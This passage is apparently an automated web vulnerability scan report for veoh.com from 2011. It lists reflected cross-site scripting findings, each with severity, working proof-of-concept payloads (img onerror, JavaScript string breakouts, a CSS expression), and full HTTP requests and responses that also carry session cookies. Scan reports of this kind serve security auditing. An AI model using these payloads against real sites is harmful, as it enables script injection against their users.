Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ48a9e'%3b18c90b1747d HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 95042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'c8bbb1855300e40d30ea4034b2810d38',
'v20767324YkGXZzfQ48a9e';18c90b1747d'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.458. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1 was submitted in the REST URL parameter 4. This input was echoed as 36ade<img src=a onerror=alert(1)>19ea89e01e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/people_and_blogs36ade<img%20src%3da%20onerror%3dalert(1)>19ea89e01e1/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 77514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_people_and_blogs36ade<img src=a onerror=alert(1)>19ea89e01e1"}</textarea>
...[SNIP]...

1.459. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac was submitted in the REST URL parameter 4. This input was echoed as b9b8b"><img src=a onerror=alert(1)>fa9b9160bac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/people_and_blogsb9b8b"><img%20src%3da%20onerror%3dalert(1)>fa9b9160bac/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 77558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/people_and_blogsb9b8b"><img src=a onerror=alert(1)>fa9b9160bac/sort/most viewed" selected="selected">
...[SNIP]...

1.460. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 614f9'%3be5e8b5ac5dc was submitted in the REST URL parameter 6. This input was echoed as 614f9';e5e8b5ac5dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP614f9'%3be5e8b5ac5dc HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=58
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'2890af68ed5816417589a98da58f349b',
'v20767178Fn5bZQJP614f9';e5e8b5ac5dc'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.461. http://www.veoh.com/category/list/tab/groups [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/groups

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 was submitted in the REST URL parameter 4. This input was echoed as ba32a"><img src=a onerror=alert(1)>a3be2b20567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/groupsba32a"><img%20src%3da%20onerror%3dalert(1)>a3be2b20567 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:47:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51

<div class="categories categories-9" id="categories-groupsba32a"><img src=a onerror=alert(1)>a3be2b20567">
<ul><li class="column1"><a href="/browse/groupsba32a%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

1.462. http://www.veoh.com/category/list/tab/home [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/home

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e was submitted in the REST URL parameter 4. This input was echoed as 254d4"><img src=a onerror=alert(1)>329c969f72e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/home254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4420
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91

<div class="categories categories-9" id="categories-home254d4"><img src=a onerror=alert(1)>329c969f72e">
<ul><li class="column1"><a href="/browse/home254d4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281
...[SNIP]...

1.463. http://www.veoh.com/category/list/tab/movies [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/movies

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d was submitted in the REST URL parameter 4. This input was echoed as d3604"><img src=a onerror=alert(1)>53d97fb589d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/moviesd3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:46:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=34

<div class="categories categories-9" id="categories-moviesd3604"><img src=a onerror=alert(1)>53d97fb589d">
<ul><li class="column1"><a href="/browse/moviesd3604%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

1.464. http://www.veoh.com/category/list/tab/music [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/music

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea was submitted in the REST URL parameter 4. This input was echoed as 32244"><img src=a onerror=alert(1)>f5bcaf4b0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/music32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4446
Date: Thu, 03 Feb 2011 21:46:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99

<div class="categories categories-9" id="categories-music32244"><img src=a onerror=alert(1)>f5bcaf4b0ea">
<ul><li class="column1"><a href="/browse/music32244%22%3E%3Cimg+src%3Da+onerror%3Dalert%2
...[SNIP]...

1.465. http://www.veoh.com/category/list/tab/tvshows [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/tvshows

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 was submitted in the REST URL parameter 4. This input was echoed as 21de1"><img src=a onerror=alert(1)>a2d080657a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/tvshows21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4498
Date: Thu, 03 Feb 2011 21:46:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=49

<div class="categories categories-9" id="categories-tvshows21de1"><img src=a onerror=alert(1)>a2d080657a4">
<ul><li class="column1"><a href="/browse/tvshows21de1%22%3E%3Cimg+src%3Da+onerror%3Dale
...[SNIP]...

1.466. http://www.veoh.com/category/list/tab/videos [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/videos

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa was submitted in the REST URL parameter 4. This input was echoed as 97565"><img src=a onerror=alert(1)>386056b84fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/videos97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:46:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90

<div class="categories categories-9" id="categories-videos97565"><img src=a onerror=alert(1)>386056b84fa">
<ul><li class="column1"><a href="/browse/videos97565%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

1.467. http://www.veoh.com/category/list/tab/webseries [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/webseries

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 was submitted in the REST URL parameter 4. This input was echoed as ac136"><img src=a onerror=alert(1)>223b61dcbe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/webseriesac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4550
Date: Thu, 03 Feb 2011 21:46:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=81

<div class="categories categories-9" id="categories-webseriesac136"><img src=a onerror=alert(1)>223b61dcbe7">
<ul><li class="column1"><a href="/browse/webseriesac136%22%3E%3Cimg+src%3Da+onerror%3
...[SNIP]...

1.468. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download/index/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 was submitted in the REST URL parameter 4. This input was echoed as b2a30"style="x:expression(alert(1))"fc975c07eb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /download/index/permalinkId/v18978294NGnK88j8b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 26859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="thumb_browse_1" href="/browse/videos/category//watch/v18978294NGnK88j8b2a30"style="x:expression(alert(1))"fc975c07eb6" title="" class="thumb thumbLink" onclick="">
...[SNIP]...

1.469. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b was submitted in the REST URL parameter 4. This input was echoed as ce5ce<img src=a onerror=alert(1)>c10905c976b in the application's response.

